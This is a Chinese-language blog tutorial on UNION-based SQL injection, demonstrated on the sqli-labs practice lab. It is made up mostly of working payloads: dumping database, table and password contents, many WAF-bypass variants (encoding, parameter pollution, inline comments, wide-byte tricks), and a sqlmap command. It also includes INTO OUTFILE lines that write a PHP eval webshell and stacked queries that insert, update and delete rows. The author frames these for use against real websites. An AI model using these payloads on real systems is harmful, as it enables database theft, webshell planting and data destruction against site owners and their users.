sql注入杂谈(一)--union select
我就简单说说我对于联合注入的想法,以及对于联合注入绕过防火墙的方法,(只是我自己目前所掌握的方法,当然更多奇淫技巧还的需要我们自己去发掘)对于我们才学习安全的人来说,对于练习sql注入,我们学习最简单的语法就是sql注入之联合注入。
就拿sqli-labs来说说吧127.0.0.1/less-1/?id=1
我们的教程里面就说127.0.0.1/less-1/?id=1' 加上单引号,看爆不爆错,如果报错了可能存在sql注入,因为当我们127.0.0.1/less-1/?id=1这样提交时,系统会自动加上单引号,就像这样127.0.0.1/less-1/?id='1',但是由于我们又加了单引号,就形成这样127.0.0.1/less-1/?id='1'',所以就会报错,这说明什么,说明系统把我们的单引号带入系统查询了,所以会存在报错。
然后教程就说第二步,(1)127.0.0.1/less-1/?id=1' order by 2--+ (2)127.0.0.1/less-1/?id=1' order by 3--+ (3)127.0.0.1/less-1/?id=1' order by 4--+我相信大家一定不会陌生,假如有3个字段,那么1和2不会报错,3就会报错,那么我们就可以笃定他有3个字段,所以,我们接下来就可以进行我们的第三步,union select,对了,在此之前,我一直搞不懂为何后面要加注释,后来才明白,我们不加注释,提交的语句为127.0.0.1/less-1/?id='1' order by 3' 这样就会报错,但是加了注释,提交的语句就是这样127.0.0.1/less-1/?id='1' order by 3#',后面的单引号就被注释掉了,就没有问题
然后我们就来到了教程的第三步127.0.0.1/less-1/?id=-1' union select 1,2,user()--+然后运用联合注入查看用户,database()数据库,@@datadir数据库的地址等等,然后我们就可以爆数据库的库名127.0.0.1/less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
127.0.0.1/less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" 爆security的表名
127.0.0.1/less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" 爆users表的字段名
127.0.0.1/less-1/?id=-1' union select 1,group_concat(username,0x7C,password),3 from users--+ 然后读取表的字段内容,
可能有的讲师讲的比较深,要说limit,然后sql注入再讲几个简单的绕waf,就过去了,初学就觉得,流啤的很,TM出数据了,好屌,其实当我们实操的时候,会发现,我们的union select根本就没有用,最后还是靠sqlmap -u xxx --batch --level=3 --risk=3 --hex --tamper="space2randomblank.py" --batch --current-db,如果没有跑出来,然后我们就想到用burpsuit抓包,然后post注入,如果这样还搞不定,那么我们就放弃了(我是这样跌跌撞撞走过来的,哈哈)
今天我就说说我的一些经验吧!虽然也不多,在大牛面前看起来也就那样,但还是分享跟那些才学安全的朋友。
首先我们看一个网站是否存在注入点,别一来就加单引号,因为某些敏感的网站,你加了单引号,你的ip直接被ban了,比如
http://127.0.0.1/sql/Less-1/?id=1-1 http://127.0.0.1/sql/Less-1/?id=1 看这2个回显的长度,用burpsuit看length,这是基于数字型的
http://127.0.0.1/sql/Less-1/?id=1'-'1 http://127.0.0.1/sql/Less-1/?id=1'-'0 这是基于字符串型的
如果是空数据类型的 http://127.0.0.1/sql/Less-1/?id=1-exp(11111) 这样判断
如若大家想用 and 1=1,我建议不要这样,因为现在大部分网站都会拦截,我们可以1%2b1=2 1%2b1>1 这样判断
这些说完了,我就来说说基于union select的绕过方法
1.网上也有很多,大小写绕过,UNIunionON SELselectECT关键字替换绕过,但是对于很多网站,这个已经不怎么实用了。
2.其次是编码以及服务器的解析(包括参数污染)
基于iis+asp的容器: s%u0065lect->select s%u00f0lect->select %U%N%I%O%N //这3种方法绕过
3.然后是是参数解析错误绕过: http://127.0.0.1/sql/Less-1/?id=1&id=-2' union select 1,user(),3--+
http://127.0.0.1/sql/Less-1/?id=-1+div+0' union select 1,2,user()--+
4.然后如果某些网站支持二次解析url编码: /**/ = %2F%2A%2A%2F == %25%32%46%25%32%41%25%32%41%25%32%46
5.然后利用hpp参数污染绕过
http://127.0.0.1/sql/Less-1/?id=1 /*&id=-1'union select 1,user(),3 -- +*/ //利用hpp参数污染
http://127.0.0.1/sql/Less-1/?id=-1' and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version()--+ //利用垃圾文件绕过
6.接下来就是内联注释绕过
union/*!/*!50000select*/ //网上说是版本号,但是我在我的less1里面10000~50000都可行,大家也可以用burpsuit遍历看长度
union/*!/**/%0aselect*/ //%0a是换行 +UnIoN/**/SeLecT/**/1,2,user() un/**/ion se/**/lect /**/union/*/select/**/
/*!40000 order*/ by 4--+ order /*!40000by*/ 4 --+
7.加入特殊字符
union %23%0aall //%23是注释,%0A是换行,相当于把注释换到下一行 union -- 1%0a select +union+select+1,user(),3--+
union(select 1,2,user())--+ +uni%0bon+se%0blect+1,2,user()--+
8.系统函数被过滤
1.列如我们的user()函数被过滤怎么办
user/**/(/**/) //利用内联注释绕过 还可以user/*!50000*/(/**/)
user/*!50000*/%23%0a(/**/) //利用注释换行绕过
`user`%0a() //利用反引号绕过+换行绕过
2.information_schema.schemata被过滤
`information_schema`.`schemata ` `information_schema`.schemata information_schema.`schemata ` //反引号3连
information_schema/**/.schemata information_schema/*!*/.schemata information_schema/*!50000*/.schemata //内联注释3连
information_schema%0a.schemata (information_schema.schemata) //特殊符号绕过
9.写文件,读文件
union select 1,load_file('C:/Users/Desktop/c.txt'),3--+ //读文件(当然需要权限),用16进制转字符串
union select 1,2,"<?php @eval($_POST[a]);?>" into outfile "C:/Desktop/b.txt"--+ //写文件
union select 1,2,"<?php @eval($_POST[a]);?>" into dumpfile "D:/3.php"--+ //写文件
针对于写读文件的绕过
union select 1,hex(load_file(0x433A2F55736572732F415355532F4465736B746F702F632E747874)),3--+
union select 1,load_file(char(99,58,47,98,101,111,116,76,105,114,105)),3--+ //可以使用hex编码和char编码来绕过,当然前面的union select也可以用前面的方法绕过
10.宽字节注入
有些时候我们对网站sql注入的时候,会发现加上单引号会被/‘斜杠加单引号套餐伺候,这个时候我们就需要运用宽字节注入,当然你的%df,你的宽字节的ascii码必须要大于128,才能使与/变成一个汉字。
127.0.0.1/less-1/?id=-1%df’ union select 1,2,version()–+这样,如果%df被拦截了
%EF%BF%BD%27union%20select%201,user(),3–+ 可以这样
11.其他(比如我们的注释–+无法注释后面的单引号)
union select 1,user(),3 and ‘1’%2b’1’='2 这样绕过,=也可以变为%3D
也可以union select 1,user(),3 and ‘2’ >'1 >也可以变为%3E
12堆叠查询
127.0.0.1/less-1/?id=1’;insert into users values (‘8’,‘xinxin’,‘shuai’)–+ //增加一条数据,当然得有权限,这些都是配合POST注入,举个例子(基于lcamry的注入天书)
比如我们在一个登陆界面,我们当然显得判断出他的闭合是什么,如若是单引号,我们就输入payload
uname=admin&passwd=c’;insert into users values (‘8’,‘xinxin’,‘shuai’)#&submit=Submit //我们直接加数据进去,当然前提的有权限
然后就是删;
delete from guest where id =7 or 1=2–+ 这个的慎用,记住,or后面必须是错误语句,否则表TM全删了。
;delete from guest where id =7 or 1=1–+ (这个就是以后别人送饭到手了)
;UPDATE guest SET firstname=‘akak’ WHERE id=3–+ //这个是改